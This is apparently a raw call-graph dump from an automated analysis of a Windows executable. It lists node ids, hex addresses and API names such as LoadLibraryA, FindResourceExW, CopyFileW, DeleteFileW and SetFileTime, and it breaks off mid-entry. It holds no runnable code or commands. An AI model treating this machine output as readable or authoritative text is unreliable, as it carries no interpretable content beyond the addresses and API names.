1cadf0 95178->96443 95180 1cbf9d 95181 1cbfa9 95180->95181 95182 2104b6 95180->95182 95184 1cc01e 95181->95184 95185 2104c6 95181->95185 96462 23359c 82 API calls __wsopen_s 95182->96462 96448 1cac91 95184->96448 96463 23359c 82 API calls __wsopen_s 95185->96463 95189 227120 22 API calls 95233 1cc039 __fread_nolock messages 95189->95233 95190 1cc7da 95193 1dfe0b 22 API calls 95190->95193 95201 1cc808 __fread_nolock 95193->95201 95196 2104f5 95198 21055a 95196->95198 96464 1dd217 235 API calls 95196->96464 95222 1cc603 95198->95222 96465 23359c 82 API calls __wsopen_s 95198->96465 95199 1dfe0b 22 API calls 95234 1cc350 __fread_nolock messages 95199->95234 95200 1caf8a 22 API calls 95200->95233 95201->95199 95202 21091a 96475 233209 23 API calls 95202->96475 95205 1cec40 235 API calls 95205->95233 95206 2108a5 95207 1cec40 235 API calls 95206->95207 95209 2108cf 95207->95209 95209->95222 96473 1ca81b 41 API calls 95209->96473 95210 210591 96466 23359c 82 API calls __wsopen_s 95210->96466 95211 2108f6 96474 23359c 82 API calls __wsopen_s 95211->96474 95217 1cc237 95219 1cc253 95217->95219 95221 1ca8c7 22 API calls 95217->95221 95218 1dfddb 22 API calls 95218->95233 95223 210976 95219->95223 95227 1cc297 messages 95219->95227 95220 1dfe0b 22 API calls 95220->95233 95221->95219 95222->95075 96476 1caceb 23 API calls messages 95223->96476 95226 2109bf 95226->95222 96477 23359c 82 API calls __wsopen_s 95226->96477 95227->95226 96459 1caceb 23 API calls messages 95227->96459 95229 1cc335 95229->95226 95231 1cc342 95229->95231 95230 1cbbe0 40 API calls 95230->95233 96460 1ca704 22 API calls messages 95231->96460 95233->95189 95233->95190 95233->95196 95233->95198 95233->95200 95233->95201 95233->95202 95233->95205 95233->95206 95233->95210 95233->95211 95233->95217 95233->95218 95233->95220 95233->95222 95233->95226 95233->95230 96452 1cad81 95233->96452 96467 227099 22 API calls __fread_nolock 95233->96467 96468 245745 54 API calls _wcslen 95233->96468 96469 1daa42 22 API calls messages 95233->96469 96470 22f05c 40 API calls 95233->96470 96471 1ca993 41 API calls 95233->96471 96472 1caceb 23 API calls messages 95233->96472 95235 1cc3ac 95234->95235 96461 1dce17 22 API calls messages 95234->96461 95235->95075 95236->95075 95237->95075 95256 1cec76 messages 95238->95256 95239 1dfddb 22 API calls 95239->95256 95240 1e0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95240->95256 95241 1e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95241->95256 95242 214beb 96491 23359c 82 API calls __wsopen_s 95242->96491 95244 1cfef7 95250 1ca8c7 22 API calls 95244->95250 95255 1ced9d messages 95244->95255 95245 1cf3ae messages 95245->95255 96488 23359c 82 API calls __wsopen_s 95245->96488 95247 214600 95253 1ca8c7 22 API calls 95247->95253 95247->95255 95248 214b0b 96489 23359c 82 API calls __wsopen_s 95248->96489 95249 1ca8c7 22 API calls 95249->95256 95250->95255 95253->95255 95255->95075 95256->95239 95256->95240 95256->95241 95256->95242 95256->95244 95256->95245 95256->95247 95256->95248 95256->95249 95256->95255 95257 1cfbe3 95256->95257 95258 1ca961 22 API calls 95256->95258 95260 1e00a3 29 API calls pre_c_initialization 95256->95260 96486 1d01e0 235 API calls 2 library calls 95256->96486 96487 1d06a0 41 API calls messages 95256->96487 95257->95245 95257->95255 95259 214bdc 95257->95259 95258->95256 96490 23359c 82 API calls __wsopen_s 95259->96490 95260->95256 95262->95075 95263->95083 95264->95083 95265->95083 95266->95104 95267->95104 95268->95098 95270 1dfe0b 22 API calls 95269->95270 95271 1ca976 95270->95271 95272 1dfddb 22 API calls 95271->95272 95273 1ca984 95272->95273 95274 1e00a3 29 API calls __onexit 95273->95274 95274->95106 95275->95104 95276->95104 95277->95104 95278->95104 95279->95104 95280->95104 95282 1d195d 95281->95282 95283 1d1981 95281->95283 95290 1d13a0 95282->95290 95422 1e0242 5 API calls __Init_thread_wait 95282->95422 95420 1e0242 5 API calls __Init_thread_wait 95283->95420 95285 1d198b 95285->95282 95421 1e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95285->95421 95288 1d8727 95288->95290 95423 1e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95288->95423 95290->95128 95292 1ca961 22 API calls 95291->95292 95293 236f1d 95292->95293 95294 1ca961 22 API calls 95293->95294 95295 236f26 95294->95295 95296 236f3a 95295->95296 95600 1cb567 95295->95600 95298 1c7510 53 API calls 95296->95298 95303 236f57 _wcslen 95298->95303 95299 2370bf 95424 1c4ecb 95299->95424 95300 236fbc 95301 1c7510 53 API calls 95300->95301 95304 236fc8 95301->95304 95303->95299 95303->95300 95370 2370e9 95303->95370 95309 1ca8c7 22 API calls 95304->95309 95313 236fdb 95304->95313 95306 2370e5 95308 1ca961 22 API calls 95306->95308 95306->95370 95307 1c4ecb 94 API calls 95307->95306 95310 23711a 95308->95310 95309->95313 95311 1ca961 22 API calls 95310->95311 95316 237126 95311->95316 95312 237027 95315 1c7510 53 API calls 95312->95315 95313->95312 95314 237005 95313->95314 95317 1ca8c7 22 API calls 95313->95317 95605 1c33c6 95314->95605 95319 237034 95315->95319 95320 1ca961 22 API calls 95316->95320 95317->95314 95322 237047 95319->95322 95323 23703d 95319->95323 95324 23712f 95320->95324 95321 23700f 95325 1c7510 53 API calls 95321->95325 95614 22e199 GetFileAttributesW 95322->95614 95326 1ca8c7 22 API calls 95323->95326 95328 1ca961 22 API calls 95324->95328 95330 23701b 95325->95330 95326->95322 95329 237138 95328->95329 95333 1c7510 53 API calls 95329->95333 95334 1c6350 22 API calls 95330->95334 95331 237050 95332 237063 95331->95332 95335 1c4c6d 22 API calls 95331->95335 95337 1c7510 53 API calls 95332->95337 95343 237069 95332->95343 95336 237145 95333->95336 95334->95312 95335->95332 95446 1c525f 95336->95446 95339 2370a0 95337->95339 95615 22d076 57 API calls 95339->95615 95340 237166 95488 1c4c6d 95340->95488 95343->95370 95345 2371a9 95347 1ca8c7 22 API calls 95345->95347 95346 1c4c6d 22 API calls 95349 237186 95346->95349 95348 2371ba 95347->95348 95350 1c6350 22 API calls 95348->95350 95349->95345 95616 1c6b57 95349->95616 95351 2371c8 95350->95351 95353 1c6350 22 API calls 95351->95353 95355 2371d6 95353->95355 95354 23719b 95356 1c6b57 22 API calls 95354->95356 95357 1c6350 22 API calls 95355->95357 95356->95345 95358 2371e4 95357->95358 95359 1c7510 53 API calls 95358->95359 95360 2371f0 95359->95360 95491 22d7bc 95360->95491 95362 237201 95363 22d4ce 4 API calls 95362->95363 95364 23720b 95363->95364 95365 1c7510 53 API calls 95364->95365 95368 237239 95364->95368 95366 237229 95365->95366 95545 232947 95366->95545 95369 1c4f39 68 API calls 95368->95369 95369->95370 95370->95156 96296 247f59 95371->96296 95373 2495af 95373->95156 95375 1c7510 53 API calls 95374->95375 95376 23f126 95375->95376 96388 1c9e90 95376->96388 95378 23f136 95379 23f15b 95378->95379 95380 1cec40 235 API calls 95378->95380 95382 23f15f 95379->95382 96416 1c9c6e 22 API calls 95379->96416 95380->95379 95382->95156 96437 22dbbe lstrlenW 95383->96437 95387 1c7510 53 API calls 95386->95387 95388 24e51d 95387->95388 95389 1ca961 22 API calls 95388->95389 95390 24e52b 95389->95390 95391 1cb567 39 API calls 95390->95391 95393 24e536 95391->95393 95392 24e560 96442 1c62b5 22 API calls 95392->96442 95393->95392 95395 1c7510 53 API calls 95393->95395 95397 24e551 95395->95397 95396 24e56c 95396->95156 95398 1c6d25 22 API calls 95397->95398 95398->95392 95400 247f59 120 API calls 95399->95400 95401 24959b 95400->95401 95401->95156 95403 1c4f43 95402->95403 95405 1c4f4a 95402->95405 95404 1ee678 67 API calls 95403->95404 95404->95405 95406 1c4f59 95405->95406 95407 1c4f6a FreeLibrary 95405->95407 95406->95156 95407->95406 95408->95158 95409->95124 95410->95127 95411->95136 95412->95150 95413->95150 95414->95126 95415->95156 95416->95156 95417->95156 95418->95159 95419->95156 95420->95285 95421->95282 95422->95288 95423->95290 95628 1c4e90 LoadLibraryA 95424->95628 95429 1c4ef6 LoadLibraryExW 95636 1c4e59 LoadLibraryA 95429->95636 95430 203ccf 95431 1c4f39 68 API calls 95430->95431 95433 203cd6 95431->95433 95435 1c4e59 3 API calls 95433->95435 95437 203cde 95435->95437 95658 1c50f5 95437->95658 95438 1c4f20 95438->95437 95439 1c4f2c 95438->95439 95441 1c4f39 68 API calls 95439->95441 95443 1c4f31 95441->95443 95443->95306 95443->95307 95445 203d05 95447 1ca961 22 API calls 95446->95447 95448 1c5275 95447->95448 95449 1ca961 22 API calls 95448->95449 95450 1c527d 95449->95450 95451 1ca961 22 API calls 95450->95451 95452 1c5285 95451->95452 95453 1ca961 22 API calls 95452->95453 95454 1c528d 95453->95454 95455 203df5 95454->95455 95456 1c52c1 95454->95456 95457 1ca8c7 22 API calls 95455->95457 95458 1c6d25 22 API calls 95456->95458 95459 203dfe 95457->95459 95460 1c52cf 95458->95460 95939 1ca6c3 95459->95939 95935 1c93b2 95460->95935 95463 1c52d9 95464 1c5304 95463->95464 95465 1c6d25 22 API calls 95463->95465 95466 1c5349 95464->95466 95467 1c5325 95464->95467 95483 203e20 95464->95483 95469 1c52fa 95465->95469 95922 1c6d25 95466->95922 95467->95466 95472 1c4c6d 22 API calls 95467->95472 95471 1c93b2 22 API calls 95469->95471 95470 1c535a 95473 1c5370 95470->95473 95478 1ca8c7 22 API calls 95470->95478 95471->95464 95475 1c5332 95472->95475 95474 1c5384 95473->95474 95479 1ca8c7 22 API calls 95473->95479 95477 1c538f 95474->95477 95481 1ca8c7 22 API calls 95474->95481 95475->95466 95480 1c6d25 22 API calls 95475->95480 95476 1c6b57 22 API calls 95485 203ee0 95476->95485 95482 1ca8c7 22 API calls 95477->95482 95487 1c539a 95477->95487 95478->95473 95479->95474 95480->95466 95481->95477 95482->95487 95483->95476 95484 1c4c6d 22 API calls 95484->95485 95485->95466 95485->95484 95945 1c49bd 22 API calls __fread_nolock 95485->95945 95487->95340 95489 1caec9 22 API calls 95488->95489 95490 1c4c78 95489->95490 95490->95345 95490->95346 95492 22d7d8 95491->95492 95493 22d7f3 95492->95493 95494 22d7dd 95492->95494 95495 1ca961 22 API calls 95493->95495 95496 1ca8c7 22 API calls 95494->95496 95544 22d7ee 95494->95544 95497 22d7fb 95495->95497 95496->95544 95498 1ca961 22 API calls 95497->95498 95499 22d803 95498->95499 95500 1ca961 22 API calls 95499->95500 95501 22d80e 95500->95501 95502 1ca961 22 API calls 95501->95502 95503 22d816 95502->95503 95504 1ca961 22 API calls 95503->95504 95505 22d81e 95504->95505 95506 1ca961 22 API calls 95505->95506 95507 22d826 95506->95507 95508 1ca961 22 API calls 95507->95508 95509 22d82e 95508->95509 95510 1ca961 22 API calls 95509->95510 95511 22d836 95510->95511 95512 1c525f 22 API calls 95511->95512 95513 22d84d 95512->95513 95514 1c525f 22 API calls 95513->95514 95515 22d866 95514->95515 95516 1c4c6d 22 API calls 95515->95516 95517 22d872 95516->95517 95518 22d885 95517->95518 95519 1c93b2 22 API calls 95517->95519 95520 1c4c6d 22 API calls 95518->95520 95519->95518 95521 22d88e 95520->95521 95522 22d89e 95521->95522 95523 1c93b2 22 API calls 95521->95523 95524 22d8b0 95522->95524 95525 1ca8c7 22 API calls 95522->95525 95523->95522 95526 1c6350 22 API calls 95524->95526 95525->95524 95527 22d8bb 95526->95527 95956 22d978 22 API calls 95527->95956 95529 22d8ca 95957 22d978 22 API calls 95529->95957 95531 22d8dd 95532 1c4c6d 22 API calls 95531->95532 95533 22d8e7 95532->95533 95534 22d8fe 95533->95534 95535 22d8ec 95533->95535 95537 1c4c6d 22 API calls 95534->95537 95536 1c33c6 22 API calls 95535->95536 95538 22d8f9 95536->95538 95539 22d907 95537->95539 95541 1c6350 22 API calls 95538->95541 95540 22d925 95539->95540 95543 1c33c6 22 API calls 95539->95543 95542 1c6350 22 API calls 95540->95542 95541->95540 95542->95544 95543->95538 95544->95362 95546 232954 __wsopen_s 95545->95546 95547 1dfe0b 22 API calls 95546->95547 95548 232971 95547->95548 95549 1c5722 22 API calls 95548->95549 95550 23297b 95549->95550 95551 23274e 27 API calls 95550->95551 95552 232986 95551->95552 95553 1c511f 64 API calls 95552->95553 95554 23299b 95553->95554 95555 2329bf 95554->95555 95556 232a6c 95554->95556 95984 232e66 95555->95984 95558 232e66 75 API calls 95556->95558 95560 232a38 95558->95560 95562 1c50f5 40 API calls 95560->95562 95594 232a75 messages 95560->95594 95563 232a91 95562->95563 95564 1c50f5 40 API calls 95563->95564 95566 232aa1 95564->95566 95565 2329ed 95991 1ed583 26 API calls 95565->95991 95567 1c50f5 40 API calls 95566->95567 95569 232abc 95567->95569 95570 1c50f5 40 API calls 95569->95570 95571 232acc 95570->95571 95572 1c50f5 40 API calls 95571->95572 95573 232ae7 95572->95573 95574 1c50f5 40 API calls 95573->95574 95575 232af7 95574->95575 95576 1c50f5 40 API calls 95575->95576 95577 232b07 95576->95577 95578 1c50f5 40 API calls 95577->95578 95579 232b17 95578->95579 95958 233017 GetTempPathW GetTempFileNameW 95579->95958 95581 232b22 95582 1ee5eb 29 API calls 95581->95582 95592 232b33 95582->95592 95583 232bed 95968 1ee678 95583->95968 95585 232bf8 95587 232c12 95585->95587 95588 232bfe DeleteFileW 95585->95588 95586 1c50f5 40 API calls 95586->95592 95589 232c91 CopyFileW 95587->95589 95596 232c18 95587->95596 95588->95594 95590 232ca7 DeleteFileW 95589->95590 95591 232cb9 DeleteFileW 95589->95591 95590->95594 95981 232fd8 CreateFileW 95591->95981 95592->95583 95592->95586 95592->95594 95959 1edbb3 95592->95959 95594->95368 95992 2322ce 95596->95992 95599 232c80 DeleteFileW 95599->95594 95601 1cb578 95600->95601 95602 1cb57f 95600->95602 95601->95602 96285 1e62d1 39 API calls 95601->96285 95602->95296 95604 1cb5c2 95604->95296 95606 1c33dd 95605->95606 95607 2030bb 95605->95607 96286 1c33ee 95606->96286 95609 1dfddb 22 API calls 95607->95609 95611 2030c5 _wcslen 95609->95611 95610 1c33e8 95610->95321 95612 1dfe0b 22 API calls 95611->95612 95613 2030fe __fread_nolock 95612->95613 95614->95331 95615->95343 95617 204ba1 95616->95617 95618 1c6b67 _wcslen 95616->95618 95619 1c93b2 22 API calls 95617->95619 95621 1c6b7d 95618->95621 95622 1c6ba2 95618->95622 95620 204baa 95619->95620 95620->95620 95623 1c6f34 22 API calls 95621->95623 95624 1dfddb 22 API calls 95622->95624 95625 1c6b85 __fread_nolock 95623->95625 95626 1c6bae 95624->95626 95625->95354 95627 1dfe0b 22 API calls 95626->95627 95627->95625 95629 1c4ea8 GetProcAddress 95628->95629 95630 1c4ec6 95628->95630 95631 1c4eb8 95629->95631 95633 1ee5eb 95630->95633 95631->95630 95632 1c4ebf FreeLibrary 95631->95632 95632->95630 95666 1ee52a 95633->95666 95635 1c4eea 95635->95429 95635->95430 95637 1c4e8d 95636->95637 95638 1c4e6e GetProcAddress 95636->95638 95641 1c4f80 95637->95641 95639 1c4e7e 95638->95639 95639->95637 95640 1c4e86 FreeLibrary 95639->95640 95640->95637 95642 1dfe0b 22 API calls 95641->95642 95643 1c4f95 95642->95643 95727 1c5722 95643->95727 95645 1c4fa1 __fread_nolock 95646 1c4fdc 95645->95646 95647 1c50a5 95645->95647 95648 203d1d 95645->95648 95651 203d22 95646->95651 95652 1c50f5 40 API calls 95646->95652 95657 1c506e messages 95646->95657 95736 1c511f 95646->95736 95730 1c42a2 CreateStreamOnHGlobal 95647->95730 95741 23304d 74 API calls 95648->95741 95653 1c511f 64 API calls 95651->95653 95652->95646 95654 203d45 95653->95654 95655 1c50f5 40 API calls 95654->95655 95655->95657 95657->95438 95659 203d70 95658->95659 95660 1c5107 95658->95660 95763 1ee8c4 95660->95763 95663 2328fe 95905 23274e 95663->95905 95665 232919 95665->95445 95669 1ee536 __FrameHandler3::FrameUnwindToState 95666->95669 95667 1ee544 95691 1ef2d9 20 API calls _abort 95667->95691 95669->95667 95671 1ee574 95669->95671 95670 1ee549 95692 1f27ec 26 API calls _abort 95670->95692 95673 1ee579 95671->95673 95674 1ee586 95671->95674 95693 1ef2d9 20 API calls _abort 95673->95693 95683 1f8061 95674->95683 95677 1ee554 __fread_nolock 95677->95635 95678 1ee58f 95679 1ee595 95678->95679 95680 1ee5a2 95678->95680 95694 1ef2d9 20 API calls _abort 95679->95694 95695 1ee5d4 LeaveCriticalSection __fread_nolock 95680->95695 95684 1f806d __FrameHandler3::FrameUnwindToState 95683->95684 95696 1f2f5e EnterCriticalSection 95684->95696 95686 1f807b 95697 1f80fb 95686->95697 95690 1f80ac __fread_nolock 95690->95678 95691->95670 95692->95677 95693->95677 95694->95677 95695->95677 95696->95686 95703 1f811e 95697->95703 95698 1f8177 95716 1f4c7d 20 API calls 2 library calls 95698->95716 95700 1f8180 95717 1f29c8 95700->95717 95703->95698 95706 1f8088 95703->95706 95714 1e918d EnterCriticalSection 95703->95714 95715 1e91a1 LeaveCriticalSection 95703->95715 95704 1f8189 95704->95706 95723 1f3405 11 API calls 2 library calls 95704->95723 95711 1f80b7 95706->95711 95707 1f81a8 95724 1e918d EnterCriticalSection 95707->95724 95710 1f81bb 95710->95706 95726 1f2fa6 LeaveCriticalSection 95711->95726 95713 1f80be 95713->95690 95714->95703 95715->95703 95716->95700 95718 1f29d3 RtlFreeHeap 95717->95718 95719 1f29fc _free 95717->95719 95718->95719 95720 1f29e8 95718->95720 95719->95704 95725 1ef2d9 20 API calls _abort 95720->95725 95722 1f29ee GetLastError 95722->95719 95723->95707 95724->95710 95725->95722 95726->95713 95728 1dfddb 22 API calls 95727->95728 95729 1c5734 95728->95729 95729->95645 95731 1c42bc FindResourceExW 95730->95731 95735 1c42d9 95730->95735 95732 2035ba LoadResource 95731->95732 95731->95735 95733 2035cf SizeofResource 95732->95733 95732->95735 95734 2035e3 LockResource 95733->95734 95733->95735 95734->95735 95735->95646 95737 203d90 95736->95737 95738 1c512e 95736->95738 95742 1eece3 95738->95742 95741->95651 95745 1eeaaa 95742->95745 95744 1c513c 95744->95646 95746 1eeab6 __FrameHandler3::FrameUnwindToState 95745->95746 95747 1eeac2 95746->95747 95749 1eeae8 95746->95749 95758 1ef2d9 20 API calls _abort 95747->95758 95760 1e918d EnterCriticalSection 95749->95760 95750 1eeac7 95759 1f27ec 26 API calls _abort 95750->95759 95753 1eeaf4 95761 1eec0a 62 API calls 2 library calls 95753->95761 95755 1eeb08 95762 1eeb27 LeaveCriticalSection __fread_nolock 95755->95762 95757 1eead2 __fread_nolock 95757->95744 95758->95750 95759->95757 95760->95753 95761->95755 95762->95757 95766 1ee8e1 95763->95766 95765 1c5118 95765->95663 95767 1ee8ed __FrameHandler3::FrameUnwindToState 95766->95767 95768 1ee92d 95767->95768 95769 1ee900 ___scrt_fastfail 95767->95769 95771 1ee925 __fread_nolock 95767->95771 95779 1e918d EnterCriticalSection 95768->95779 95793 1ef2d9 20 API calls _abort 95769->95793 95771->95765 95772 1ee937 95780 1ee6f8 95772->95780 95775 1ee91a 95794 1f27ec 26 API calls _abort 95775->95794 95779->95772 95784 1ee70a ___scrt_fastfail 95780->95784 95786 1ee727 95780->95786 95781 1ee717 95868 1ef2d9 20 API calls _abort 95781->95868 95783 1ee71c 95869 1f27ec 26 API calls _abort 95783->95869 95784->95781 95784->95786 95791 1ee76a __fread_nolock 95784->95791 95795 1ee96c LeaveCriticalSection __fread_nolock 95786->95795 95787 1ee886 ___scrt_fastfail 95871 1ef2d9 20 API calls _abort 95787->95871 95791->95786 95791->95787 95796 1ed955 95791->95796 95803 1f8d45 95791->95803 95870 1ecf78 26 API calls 4 library calls 95791->95870 95793->95775 95794->95771 95795->95771 95797 1ed976 95796->95797 95798 1ed961 95796->95798 95797->95791 95872 1ef2d9 20 API calls _abort 95798->95872 95800 1ed966 95873 1f27ec 26 API calls _abort 95800->95873 95802 1ed971 95802->95791 95804 1f8d6f 95803->95804 95805 1f8d57 95803->95805 95807 1f90d9 95804->95807 95812 1f8db4 95804->95812 95883 1ef2c6 20 API calls _abort 95805->95883 95899 1ef2c6 20 API calls _abort 95807->95899 95808 1f8d5c 95884 1ef2d9 20 API calls _abort 95808->95884 95811 1f90de 95900 1ef2d9 20 API calls _abort 95811->95900 95813 1f8d64 95812->95813 95815 1f8dbf 95812->95815 95819 1f8def 95812->95819 95813->95791 95885 1ef2c6 20 API calls _abort 95815->95885 95816 1f8dcc 95901 1f27ec 26 API calls _abort 95816->95901 95818 1f8dc4 95886 1ef2d9 20 API calls _abort 95818->95886 95822 1f8e08 95819->95822 95823 1f8e2e 95819->95823 95824 1f8e4a 95819->95824 95822->95823 95858 1f8e15 95822->95858 95887 1ef2c6 20 API calls _abort 95823->95887 95890 1f3820 21 API calls 2 library calls 95824->95890 95827 1f8e33 95888 1ef2d9 20 API calls _abort 95827->95888 95828 1f8e61 95831 1f29c8 _free 20 API calls 95828->95831 95834 1f8e6a 95831->95834 95832 1f8fb3 95835 1f9029 95832->95835 95839 1f8fcc GetConsoleMode 95832->95839 95833 1f8e3a 95889 1f27ec 26 API calls _abort 95833->95889 95837 1f29c8 _free 20 API calls 95834->95837 95838 1f902d ReadFile 95835->95838 95840 1f8e71 95837->95840 95841 1f9047 95838->95841 95842 1f90a1 GetLastError 95838->95842 95839->95835 95843 1f8fdd 95839->95843 95844 1f8e7b 95840->95844 95845 1f8e96 95840->95845 95841->95842 95848 1f901e 95841->95848 95846 1f90ae 95842->95846 95847 1f9005 95842->95847 95843->95838 95849 1f8fe3 ReadConsoleW 95843->95849 95891 1ef2d9 20 API calls _abort 95844->95891 95893 1f9424 28 API calls __fread_nolock 95845->95893 95897 1ef2d9 20 API calls _abort 95846->95897 95865 1f8e45 __fread_nolock 95847->95865 95894 1ef2a3 20 API calls 2 library calls 95847->95894 95861 1f906c 95848->95861 95862 1f9083 95848->95862 95848->95865 95849->95848 95850 1f8fff GetLastError 95849->95850 95850->95847 95851 1f29c8 _free 20 API calls 95851->95813 95856 1f8e80 95892 1ef2c6 20 API calls _abort 95856->95892 95857 1f90b3 95898 1ef2c6 20 API calls _abort 95857->95898 95874 1ff89b 95858->95874 95895 1f8a61 31 API calls 3 library calls 95861->95895 95864 1f909a 95862->95864 95862->95865 95896 1f88a1 29 API calls __fread_nolock 95864->95896 95865->95851 95867 1f909f 95867->95865 95868->95783 95869->95786 95870->95791 95871->95783 95872->95800 95873->95802 95875 1ff8a8 95874->95875 95876 1ff8b5 95874->95876 95902 1ef2d9 20 API calls _abort 95875->95902 95879 1ff8c1 95876->95879 95903 1ef2d9 20 API calls _abort 95876->95903 95878 1ff8ad 95878->95832 95879->95832 95881 1ff8e2 95904 1f27ec 26 API calls _abort 95881->95904 95883->95808 95884->95813 95885->95818 95886->95816 95887->95827 95888->95833 95889->95865 95890->95828 95891->95856 95892->95865 95893->95858 95894->95865 95895->95865 95896->95867 95897->95857 95898->95865 95899->95811 95900->95816 95901->95813 95902->95878 95903->95881 95904->95878 95908 1ee4e8 95905->95908 95907 23275d 95907->95665 95911 1ee469 95908->95911 95910 1ee505 95910->95907 95912 1ee48c 95911->95912 95913 1ee478 95911->95913 95918 1ee488 __alldvrm 95912->95918 95921 1f333f 11 API calls 2 library calls 95912->95921 95919 1ef2d9 20 API calls _abort 95913->95919 95915 1ee47d 95920 1f27ec 26 API calls _abort 95915->95920 95918->95910 95919->95915 95920->95918 95921->95918 95923 1c6d34 95922->95923 95924 1c6d91 95922->95924 95923->95924 95926 1c6d3f 95923->95926 95925 1c93b2 22 API calls 95924->95925 95931 1c6d62 __fread_nolock 95925->95931 95927 1c6d5a 95926->95927 95928 204c9d 95926->95928 95946 1c6f34 95927->95946 95930 1dfddb 22 API calls 95928->95930 95932 204ca7 95930->95932 95931->95470 95933 1dfe0b 22 API calls 95932->95933 95934 204cda 95933->95934 95936 1c93c0 95935->95936 95937 1c93c9 __fread_nolock 95935->95937 95936->95937 95950 1caec9 95936->95950 95937->95463 95937->95937 95940 1ca6dd 95939->95940 95941 1ca6d0 95939->95941 95942 1dfddb 22 API calls 95940->95942 95941->95464 95943 1ca6e7 95942->95943 95944 1dfe0b 22 API calls 95943->95944 95944->95941 95945->95485 95947 1c6f4c 95946->95947 95949 1c6f46 95946->95949 95948 1dfe0b 22 API calls 95947->95948 95948->95949 95949->95931 95951 1caedc 95950->95951 95955 1caed9 __fread_nolock 95950->95955 95952 1dfddb 22 API calls 95951->95952 95953 1caee7 95952->95953 95954 1dfe0b 22 API calls 95953->95954 95954->95955 95955->95937 95956->95529 95957->95531 95958->95581 95960 1edbdd 95959->95960 95961 1edbc1 95959->95961 95960->95592 95961->95960 95962 1edbcd 95961->95962 95963 1edbe3 95961->95963 96024 1ef2d9 20 API calls _abort 95962->96024 96021 1ed9cc 95963->96021 95966 1edbd2 96025 1f27ec 26 API calls _abort 95966->96025 95969 1ee684 __FrameHandler3::FrameUnwindToState 95968->95969 95970 1ee695 95969->95970 95972 1ee6aa 95969->95972 96177 1ef2d9 20 API calls _abort 95970->96177 95980 1ee6a5 __fread_nolock 95972->95980 96160 1e918d EnterCriticalSection 95972->96160 95973 1ee69a 96178 1f27ec 26 API calls _abort 95973->96178 95976 1ee6c6 96161 1ee602 95976->96161 95978 1ee6d1 96179 1ee6ee LeaveCriticalSection __fread_nolock 95978->96179 95980->95585 95982 233013 95981->95982 95983 232fff SetFileTime CloseHandle 95981->95983 95982->95594 95983->95982 95988 232e7a 95984->95988 95985 1c50f5 40 API calls 95985->95988 95986 2329c4 95986->95594 95990 1ed583 26 API calls 95986->95990 95987 2328fe 27 API calls 95987->95988 95988->95985 95988->95986 95988->95987 95989 1c511f 64 API calls 95988->95989 95989->95988 95990->95565 95991->95560 95993 2322d9 95992->95993 95994 2322e7 95992->95994 95995 1ee5eb 29 API calls 95993->95995 95996 23232c 95994->95996 95997 1ee5eb 29 API calls 95994->95997 96020 2322f0 95994->96020 95995->95994 96253 232557 95996->96253 95998 232311 95997->95998 95998->95996 96000 23231a 95998->96000 96004 1ee678 67 API calls 96000->96004 96000->96020 96001 232370 96002 232395 96001->96002 96003 232374 96001->96003 96257 232171 96002->96257 96006 1ee678 67 API calls 96003->96006 96007 232381 96003->96007 96004->96020 96006->96007 96009 1ee678 67 API calls 96007->96009 96007->96020 96008 23239d 96010 2323c3 96008->96010 96011 2323a3 96008->96011 96009->96020 96264 2323f3 96010->96264 96013 2323b0 96011->96013 96014 1ee678 67 API calls 96011->96014 96015 1ee678 67 API calls 96013->96015 96013->96020 96014->96013 96015->96020 96016 2323ca 96017 2323de 96016->96017 96018 1ee678 67 API calls 96016->96018 96019 1ee678 67 API calls 96017->96019 96017->96020 96018->96017 96019->96020 96020->95591 96020->95599 96026 1ed97b 96021->96026 96023 1ed9f0 96023->95960 96024->95966 96025->95960 96027 1ed987 __FrameHandler3::FrameUnwindToState 96026->96027 96034 1e918d EnterCriticalSection 96027->96034 96029 1ed995 96035 1ed9f4 96029->96035 96033 1ed9b3 __fread_nolock 96033->96023 96034->96029 96043 1f49a1 96035->96043 96041 1ed9a2 96042 1ed9c0 LeaveCriticalSection __fread_nolock 96041->96042 96042->96033 96044 1ed955 __fread_nolock 26 API calls 96043->96044 96045 1f49b0 96044->96045 96046 1ff89b __fread_nolock 26 API calls 96045->96046 96048 1f49b6 96046->96048 96047 1eda09 96052 1eda3a 96047->96052 96048->96047 96064 1f3820 21 API calls 2 library calls 96048->96064 96050 1f4a15 96051 1f29c8 _free 20 API calls 96050->96051 96051->96047 96053 1eda24 96052->96053 96056 1eda4c 96052->96056 96063 1f4a56 62 API calls 96053->96063 96054 1eda5a 96090 1ef2d9 20 API calls _abort 96054->96090 96056->96053 96056->96054 96060 1eda85 __fread_nolock 96056->96060 96057 1eda5f 96091 1f27ec 26 API calls _abort 96057->96091 96060->96053 96061 1ed955 __fread_nolock 26 API calls 96060->96061 96065 1f59be 96060->96065 96092 1edc0b 96060->96092 96061->96060 96063->96041 96064->96050 96066 1f59ca __FrameHandler3::FrameUnwindToState 96065->96066 96067 1f59d2 96066->96067 96070 1f59ea 96066->96070 96152 1ef2c6 20 API calls _abort 96067->96152 96069 1f5a88 96157 1ef2c6 20 API calls _abort 96069->96157 96070->96069 96075 1f5a1f 96070->96075 96071 1f59d7 96153 1ef2d9 20 API calls _abort 96071->96153 96074 1f5a8d 96158 1ef2d9 20 API calls _abort 96074->96158 96098 1f5147 EnterCriticalSection 96075->96098 96078 1f5a95 96159 1f27ec 26 API calls _abort 96078->96159 96079 1f5a25 96081 1f5a56 96079->96081 96082 1f5a41 96079->96082 96099 1f5aa9 96081->96099 96154 1ef2d9 20 API calls _abort 96082->96154 96085 1f59df __fread_nolock 96085->96060 96086 1f5a51 96156 1f5a80 LeaveCriticalSection __wsopen_s 96086->96156 96087 1f5a46 96155 1ef2c6 20 API calls _abort 96087->96155 96090->96057 96091->96053 96093 1edc23 96092->96093 96095 1edc1f 96092->96095 96094 1ed955 __fread_nolock 26 API calls 96093->96094 96093->96095 96096 1edc43 96094->96096 96095->96060 96097 1f59be __wsopen_s 62 API calls 96096->96097 96097->96095 96098->96079 96100 1f5ad7 96099->96100 96138 1f5ad0 96099->96138 96101 1f5adb 96100->96101 96102 1f5afa 96100->96102 96104 1ef2c6 __dosmaperr 20 API calls 96101->96104 96106 1f5b4b 96102->96106 96107 1f5b2e 96102->96107 96103 1e0a8c CatchGuardHandler 5 API calls 96108 1f5cb1 96103->96108 96105 1f5ae0 96104->96105 96109 1ef2d9 _free 20 API calls 96105->96109 96110 1f5b61 96106->96110 96113 1f9424 __fread_nolock 28 API calls 